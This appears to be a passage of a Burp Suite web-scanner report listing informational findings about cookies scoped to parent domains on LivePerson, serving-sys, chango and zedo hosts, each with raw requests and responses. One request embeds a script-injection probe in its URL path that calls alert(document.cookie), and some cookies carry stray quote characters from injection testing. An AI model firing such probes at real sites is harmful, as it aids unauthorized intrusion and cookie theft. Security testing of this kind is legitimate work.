Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.33. http://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101423669632-1296223154:0; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net
LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?&site=5296924&cmd=mTagStartPage&lpCallId=388698517112-580234512686&protV=20&lpjson=1&page=http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&id=4553523208&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-english&activePlugin=none&cobrowse=true&PV%21MktSegment=&PV%21unit=sales&PV%21Section=SEOLanding&PV%21CampaignCode=&PV%21pageLoadTime=4%20sec&PV%21visitorActive=1&SV%21language=english&title=Live%20Chat%20by%20LivePerson&cookie=visitor%3Dvarid%3Dbing%26ref%3Dbing%2Bcpc%2B%2Bchat%2B%252Dus%3B%20ASPSESSIONIDQSDTDCQS%3DICGJONICHIIHMLMANIPEDEIG%3B%20__utmz%3D1.1296223198.1.1.utmcsr%3Dbing%7Cutmccn%3Dchat%2520-us%7Cutmcmd%3Dcpc%3B%20__utma%3D1.925961970.1296223198.1296223198.1296223198.1%3B%20__utmc%3D1%3B%20__utmb%3D1.1.10.1296223198 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:59:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296223154:0; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=6680227135865200365; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 13:59:14 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"388698517112-580234512686","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

10.34. https://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/5296924/?lpCallId=1296223666173-668&lpjson=2&cmd=visitorEvents&site=5296924&sessionkey=H6680227135865200365-3761611791040242971K15949386&se=0 HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=primary; LPit=true; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:06:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LPit=false; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 14:06:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 893

lpConnLib.Process({"ResultSet": {"lpCallId":"1296223666173-668","lpCallConfirm":"","lpData":[{"eSeq":0,"params":["noChatSession","Chat session has ended. Please close this window and click the chat bu
...[SNIP]...

10.35. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/?cmd=file&file=visitorWantsToTalk&site=5296924&voiceMethod=esc HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://burp/show/9
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; HumanClickCHATKEY=3761611791040242971; LPit=false; LivePersonID=-16101423669632-1296224208:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Master; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:05:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=8955939450992135978; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: text/html;charset=UTF-8
Last-Modified: Fri, 28 Jan 2011 15:05:19 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 26936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">

<head>
<title>
...[SNIP]...

10.36. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=f+JvabEk02WG00002h5iUabLQ07l00000Gh5j3abPm07l00000Sgn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
B3=7lgH0000000001sG89PS000000000GsZ89PT000000000Ss+852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=2137335&Page=&PluID=0&Pos=1348\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-14437/Type-0/7af38356-1767-4fe6-b92f-837e34fde281.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEk02WG00002h5iUabLQ07l00000Gh5j3abPm07l00000Sgn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG89PS000000000GsZ89PT000000000Ss+852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_1348\=4478147
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 05:22:54 GMT
Connection: close

10.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 28 Jan 2011 17:37:30 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.38. http://c.chango.com/collector/tag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.chango.com
Path:	/collector/tag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_t=21d8e954-2b06-11e0-8e8a-0025900870d2; Domain=chango.com; expires=Mon, 25 Jan 2021 17:43:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collector/tag.js?_r=1296236606219&partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F&q=mass%20texting HTTP/1.1
Host: c.chango.com
Proxy-Connection: keep-alive
Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:43:35 GMT
Content-Type: text/javascript
Connection: close
Server: TornadoServer/1.1
Etag: "96e7c3afd30c151e7af6141145727255f5ec8c76"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _t=21d8e954-2b06-11e0-8e8a-0025900870d2; Domain=chango.com; expires=Mon, 25 Jan 2021 17:43:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Thu, 28 Apr 2011 17:43:35 GMT; Path=/
Content-Length: 1303

(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('21d8e954-2b06-11e0-8e8a-0025900870d2');(new Image()).src = 'http://bid.openx.net/cm?p
...[SNIP]...

10.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 978
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=55
Expires: Fri, 28 Jan 2011 17:27:35 GMT
Date: Fri, 28 Jan 2011 17:26:40 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

10.40. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 955
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=563
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:37 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

10.41. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 979
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=257
Expires: Fri, 28 Jan 2011 17:30:57 GMT
Date: Fri, 28 Jan 2011 17:26:40 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

10.42. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

